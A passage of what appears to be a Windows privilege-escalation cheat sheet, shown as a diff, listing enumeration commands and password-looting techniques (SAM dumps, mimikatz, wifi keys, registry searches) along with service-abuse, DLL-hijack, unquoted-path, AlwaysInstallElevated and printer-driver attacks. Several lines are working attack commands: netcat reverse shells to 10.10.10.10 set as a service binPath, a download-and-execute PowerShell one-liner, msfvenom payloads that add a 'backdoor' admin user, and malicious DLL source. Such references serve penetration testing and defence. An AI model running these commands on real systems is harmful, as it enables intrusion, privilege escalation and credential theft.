accounts +``` + +Get details about a user (i.e. administrator, admin, current user) + +```powershell +net user administrator +net user admin +net user %USERNAME% +``` + +List all local groups + +```powershell +net localgroup +Get-LocalGroup | ft Name +``` + +Get details about a group (i.e. administrators) + +```powershell +net localgroup administrators +Get-LocalGroupMember Administrators | ft Name, PrincipalSource +Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource +``` + +Get Domain Controllers + +```powershell +nltest /DCLIST:DomainName +nltest /DCNAME:DomainName +nltest /DSGETDC:DomainName +``` + +## Network Enumeration + +List all network interfaces, IP, and DNS. 
+ +```powershell +ipconfig /all +Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address +Get-DnsClientServerAddress -AddressFamily IPv4 | ft +``` + +List current routing table + +```powershell +route print +Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex +``` + +List the ARP table + +```powershell +arp -A +Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State +``` + +List all current connections + +```powershell +netstat -ano +``` + +List all network shares + +```powershell +net share +powershell Find-DomainShare -ComputerDomain domain.local +``` + +SNMP Configuration + +```powershell +reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s +Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse +``` + +## Antivirus Enumeration + +Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` + + +## Default Writeable Folders + +```powershell +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\System32\spool\printers +C:\Windows\System32\spool\servers +C:\Windows\tracing +C:\Windows\Temp +C:\Users\Public +C:\Windows\Tasks +C:\Windows\System32\tasks +C:\Windows\SysWOW64\tasks +C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system +C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system +C:\Windows\debug\wia +C:\Windows\registration\crmlog +C:\Windows\System32\com\dmp +C:\Windows\SysWOW64\com\dmp +C:\Windows\System32\fxstmp +C:\Windows\SysWOW64\fxstmp +``` + +## EoP - Looting for passwords + +### SAM and SYSTEM files + +The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM. 
+ +```powershell +# Usually %SYSTEMROOT% = C:\Windows +%SYSTEMROOT%\repair\SAM +%SYSTEMROOT%\System32\config\RegBack\SAM +%SYSTEMROOT%\System32\config\SAM +%SYSTEMROOT%\repair\system +%SYSTEMROOT%\System32\config\SYSTEM +%SYSTEMROOT%\System32\config\RegBack\system +``` + +Generate a hash file for John using `pwdump` or `samdump2`. + +```powershell +pwdump SYSTEM SAM > /root/sam.txt +samdump2 SYSTEM SAM -o sam.txt +``` + +Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash. + + +### HiveNightmare + +> CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user + +Check for the vulnerability using `icacls` + +```powershell +C:\Windows\System32> icacls config\SAM +config\SAM BUILTIN\Administrators:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access! +``` + +Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it. + +```powershell +mimikatz> token::whoami /full + +# List shadow copies available +mimikatz> misc::shadowcopies + +# Extract account from SAM databases +mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM + +# Extract secrets from SECURITY +mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY +``` + +### LAPS Settings + +Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. 
+ +* LAPS Enabled: AdmPwdEnabled +* LAPS Admin Account Name: AdminAccountName +* LAPS Password Complexity: PasswordComplexity +* LAPS Password Length: PasswordLength +* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled + + +### Search for file contents + +```powershell +cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt +findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt +findstr /spin "password" *.* +``` + +Also search in remote places such as SMB Shares and SharePoint: + +* Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint) (must be compiled first, for referencing issue see: https://github.com/nheiniger/SnaffPoint/pull/6) + +```powershell +# First, retrieve a token +## Method 1: using SnaffPoint binary +$token = (.\GetBearerToken.exe https://your.sharepoint.com) +## Method 2: using AADInternals +Install-Module AADInternals -Scope CurrentUser +Import-Module AADInternals +$token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com") + +# Second, search on Sharepoint +## Method 1: using search strings in ./presets dir +.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token +## Method 2: using search string in command line +### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference +.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config" +``` + +* Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) + +### Search for a file with a certain filename + +```powershell +dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* +where /R C:\ user.txt +where /R C:\ *.ini +``` + +### Search the registry for key names and passwords + +```powershell +REG QUERY HKLM /F "password" /t REG_SZ /S /K +REG QUERY HKCU /F "password" /t REG_SZ /S 
/K + +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" +reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters +reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials +reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials +reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password + +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s +``` + +### Passwords in unattend.xml + +Location of the unattend.xml files. + +```powershell +C:\unattend.xml +C:\Windows\Panther\Unattend.xml +C:\Windows\Panther\Unattend\Unattend.xml +C:\Windows\system32\sysprep.inf +C:\Windows\system32\sysprep\sysprep.xml +``` + +Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`. + +Example content + +```powershell + + + U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo== + true + Administrateur + + + + + + *SENSITIVE*DATA*DELETED* + administrators;users + Administrateur + + + +``` + +Unattend credentials are stored in base64 and can be decoded manually with base64. + +```powershell +$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d +SecretSecurePassword1234* +``` + +The Metasploit module `post/windows/gather/enum_unattend` looks for these files. 
+ +### IIS Web config + +```powershell +Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue +``` + +```powershell +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config +C:\inetpub\wwwroot\web.config +``` + +### Other files + +```bat +%SYSTEMDRIVE%\pagefile.sys +%WINDIR%\debug\NetSetup.log +%WINDIR%\repair\sam +%WINDIR%\repair\system +%WINDIR%\repair\software, %WINDIR%\repair\security +%WINDIR%\iis6.log +%WINDIR%\system32\config\AppEvent.Evt +%WINDIR%\system32\config\SecEvent.Evt +%WINDIR%\system32\config\default.sav +%WINDIR%\system32\config\security.sav +%WINDIR%\system32\config\software.sav +%WINDIR%\system32\config\system.sav +%WINDIR%\system32\CCM\logs\*.log +%USERPROFILE%\ntuser.dat +%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat +%WINDIR%\System32\drivers\etc\hosts +C:\ProgramData\Configs\* +C:\Program Files\Windows PowerShell\* +dir c:*vnc.ini /s /b +dir c:*ultravnc.ini /s /b +``` + +### Wifi passwords + +Find AP SSID +```bat +netsh wlan show profile +``` + +Get Cleartext Pass +```bat +netsh wlan show profile key=clear +``` + +Oneliner method to extract wifi passwords from all the access point. + +```batch +cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) 
& @echo on +``` + +### Sticky Notes passwords + +The sticky notes app stores it's content in a sqlite db located at `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` + +### Passwords stored in services + +Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher) + + +```powershell +https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 +Import-Module path\to\SessionGopher.ps1; +Invoke-SessionGopher -AllDomain -o +Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss +``` + + +### Passwords stored in Key Manager + +:warning: This software will display its output in a GUI + +```ps1 +rundll32 keymgr,KRShowKeyMgr +``` + +### Powershell History + +Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`. + +```powershell +type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt +type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt +type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt +cat (Get-PSReadlineOption).HistorySavePath +cat (Get-PSReadlineOption).HistorySavePath | sls passw +``` + +### Powershell Transcript + +```xml +C:\Users\\Documents\PowerShell_transcript....txt +C:\Transcripts\\PowerShell_transcript....txt +``` + +### Password in Alternate Data Stream + +```ps1 +PS > Get-Item -path flag.txt -Stream * +PS > Get-Content -path flag.txt -Stream Flag +``` + +## EoP - Processes Enumeration and Tasks + +* What processes are running? 
+ ```powershell + tasklist /v + net start + sc query + Get-Service + Get-Process + Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize + ``` + +* Which processes are running as "system" + ```powershell + tasklist /v /fi "username eq system" + ``` + +* Do you have powershell magic? + ```powershell + REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion + ``` + +* List installed programs + ```powershell + Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime + Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name + ``` + +* List services + ```powershell + net start + wmic service list brief + tasklist /SVC + ``` + +* Enumerate scheduled tasks + ```powershell + schtasks /query /fo LIST 2>nul | findstr TaskName + schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM + Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State + ``` + +* Startup tasks + ```powershell + wmic startup get caption,command + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce + dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" + dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" + ``` + +## EoP - Incorrect permissions in services + +> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system. 
+ +Often, services are pointing to writeable locations: +- Orphaned installs, not installed anymore but still exist in startup +- DLL Hijacking + ```powershell + # find missing DLL + - Find-PathDLLHijack PowerUp.ps1 + - Process Monitor : check for "Name Not Found" + + # compile a malicious dll + - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll" + - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll" + + # content of windows_dll.c + #include + BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { + if (dwReason == DLL_PROCESS_ATTACH) { + system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); + ExitProcess(0); + } + return TRUE; + } + ``` + +- PATH directories with weak permissions + ```powershell + $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt + $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" + + $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt + FOR /F %i in (Servicenames.txt) DO echo %i + type Servicenames.txt + FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt + FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt + ``` + +Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions` + +Note to check file permissions you can use `cacls` and `icacls` +> icacls (Windows Vista +) +> cacls (Windows XP) + +You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output. 
+ +### Example with Windows 10 - CVE-2019-1322 UsoSvc + +Prerequisite: Service account + +```powershell +PS C:\Windows\system32> sc.exe stop UsoSvc +PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe qc usosvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: usosvc + TYPE : 20 WIN32_SHARE_PROCESS + START_TYPE : 2 AUTO_START (DELAYED) + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Update Orchestrator Service + DEPENDENCIES : rpcss + SERVICE_START_NAME : LocalSystem + +PS C:\Windows\system32> sc.exe start UsoSvc +``` + +### Example with Windows XP SP1 - upnphost + +```powershell +# NOTE: spaces are mandatory for this exploit to work ! +sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe" +sc config upnphost obj= ".\LocalSystem" password= "" +sc qc upnphost +sc config upnphost depend= "" +net start upnphost +``` + +If it fails because of a missing dependency, try the following commands. 
+ +```powershell +sc config SSDPSRV start=auto +net start SSDPSRV +net stop upnphost +net start upnphost + +sc config upnphost depend="" +``` + +Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe) + +```powershell +$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula +RW SSDPSRV + SERVICE_ALL_ACCESS +RW upnphost + SERVICE_ALL_ACCESS + +$ accesschk.exe -ucqv upnphost +upnphost + RW NT AUTHORITY\SYSTEM + SERVICE_ALL_ACCESS + RW BUILTIN\Administrators + SERVICE_ALL_ACCESS + RW NT AUTHORITY\Authenticated Users + SERVICE_ALL_ACCESS + RW BUILTIN\Power Users + SERVICE_ALL_ACCESS + +$ sc config binpath="net user backdoor backdoor123 /add" +$ sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" +$ sc stop +$ sc start +$ sc config binpath="net localgroup Administrators backdoor /add" +$ sc stop +$ sc start +``` + +## EoP - Windows Subsystem for Linux (WSL) + +Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) + +> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse. 
+ +```powershell +wsl whoami +./ubuntun1604.exe config --default-user root +wsl whoami +wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' +``` + +Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` + +Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` + +## EoP - Unquoted Service Paths + +The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. + +```powershell +wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ + +wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ + +gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name +``` + +* Metasploit exploit : `exploit/windows/local/trusted_service_path` +* PowerUp exploit + ```powershell + # find the vulnerable application + C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" + + ... + [*] Checking for unquoted service paths... + ServiceName : BBSvc + Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe + StartName : LocalSystem + AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path + ... 
+ + # automatic exploit + Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe" + ``` + +### Example + +For `C:\Program Files\something\legit.exe`, Windows will try the following paths first: +- `C:\Program.exe` +- `C:\Program Files.exe` + + +## EoP - $PATH Interception + +Requirements: +- PATH contains a writeable folder with low privileges. +- The writeable folder is _before_ the folder that contains the legitimate binary. + +EXAMPLE: +```powershell +# List contents of the PATH environment variable +# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 +$env:Path + +# See permissions of the target folder +# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW +icacls.exe "C:\Program Files\nodejs\" + +# Place our evil-file in that folder. +copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" +``` + +Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. + + +## EoP - Named Pipes + +1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` +2. Check named pipes DACL: `pipesec.exe ` +3. Reverse engineering software +4. 
Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe` + + +## EoP - Kernel Exploitation + +List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) + +##### #Security Bulletin   #KB     #Description    #Operating System +- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8) +- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008) +- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008) +- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2) +- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1) +- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP) +- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016) +- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1) +- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1) +- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012) +- 
[MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012) +- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012) +- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7) +- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7) +... +- [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) + +To cross compile a program from Kali, use the following command. + +```powershell +Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c +``` + +## EoP - Microsoft Windows Installer + +### AlwaysInstallElevated + +Using the `reg query` command, you can check the status of the `AlwaysInstallElevated` registry key for both the user and the machine. If both queries return a value of `0x1`, then `AlwaysInstallElevated` is enabled for both user and machine, indicating the system is vulnerable. + +* Shell command + ```powershell + reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + ``` +* PowerShell command + ```powershell + Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer + Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer + ``` + +Then create an MSI package and install it. 
+ +```powershell +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi +$ msiexec /quiet /qn /i C:\evil.msi +``` + +Technique also available in : +* Metasploit : `exploit/windows/local/always_install_elevated` +* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI` + + +### CustomActions + +> Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation + +* [mgeeky/msidump](https://github.com/mgeeky/msidump) - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner. +* [activescott/lessmsi](https://github.com/activescott/lessmsi) - A tool to view and extract the contents of an Windows Installer (.msi) file. +* [mandiant/msi-search](https://github.com/mandiant/msi-search) - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file. + +Enumerate products on the machine + +```ps1 +wmic product get identifyingnumber,name,vendor,version +``` + +Execute the repair process with the `/fa` parameter to trigger the CustomActions. +We can use both IdentifyingNumber `{E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1}` or path to the installer `c:\windows\installer\XXXXXXX.msi`. +The repair will run with the NT SYSTEM account. + +```ps1 +$installed = Get-WmiObject Win32_Product +$string= $installed | select-string -pattern "PRODUCTNAME" +$string[0] -match '{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}}' +Start-Process -FilePath "msiexec.exe" -ArgumentList "/fa $($matches[0])" +``` + +Common mistakes in MSI installers: + +* Missing quiet parameters: it will spawn `conhost.exe` as `NT SYSTEM`. Use `[CTRL]+[A]` to select some text in it, it will pause the execution. 
+ * conhost -> properties -> "legacy console mode" Link -> Internet Explorer -> CTRL+O –> cmd.exe +* GUI with direct actions: open a URL and start the browser then use the same scenario. +* Binaries/Scripts loaded from user writable paths: you might need to win the race condition. +* DLL hijacking/search order abusing +* PowerShell `-NoProfile` missing: Add custom commands into your profile + ```ps1 + new-item -Path $PROFILE -Type file -Force + echo "Start-Process -FilePath cmd.exe -Wait;" > $PROFILE + ``` + + +## EoP - Insecure GUI apps + +Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. + +Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" + + +## EoP - Evaluating Vulnerable Drivers + +Look for vuln drivers loaded, we often don't spend enough time looking at this: + +* [Living Off The Land Drivers](https://www.loldrivers.io/) is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats. 
+* Native binary: DriverQuery.exe + ```powershell + PS C:\Users\Swissky> driverquery.exe /fo table /si + Module Name Display Name Driver Type Link Date + ============ ====================== ============= ====================== + 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM + 3ware 3ware Kernel 5/18/2015 6:28:03 PM + ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM + AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM + acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM + acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM + AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM + acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM + ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM + + ``` +* [matterpreter/OffensiveCSharp/DriverQuery](https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery) + ```powershell + PS C:\Users\Swissky> DriverQuery.exe --no-msft + [+] Enumerating driver services... + [+] Checking file signatures... + Citrix USB Filter Driver + Service Name: ctxusbm + Path: C:\Windows\system32\DRIVERS\ctxusbm.sys + Version: 14.11.0.138 + Creation Time (UTC): 17/05/2018 01:20:50 + Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US + Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US + + ``` + +## EoP - Printers + +### Universal Printer + +Create a Printer + +```ps1 +$printerName = 'Universal Priv Printer' +$system32 = $env:systemroot + '\system32' +$drivers = $system32 + '\spool\drivers' +$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName + +Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll') +Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll') +Copy-Item -Force -Path 
'.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll') + +Add-PrinterDriver -Name 'Generic / Text Only' +Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared + +New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null +New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null +New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null +New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null +``` + +Execute 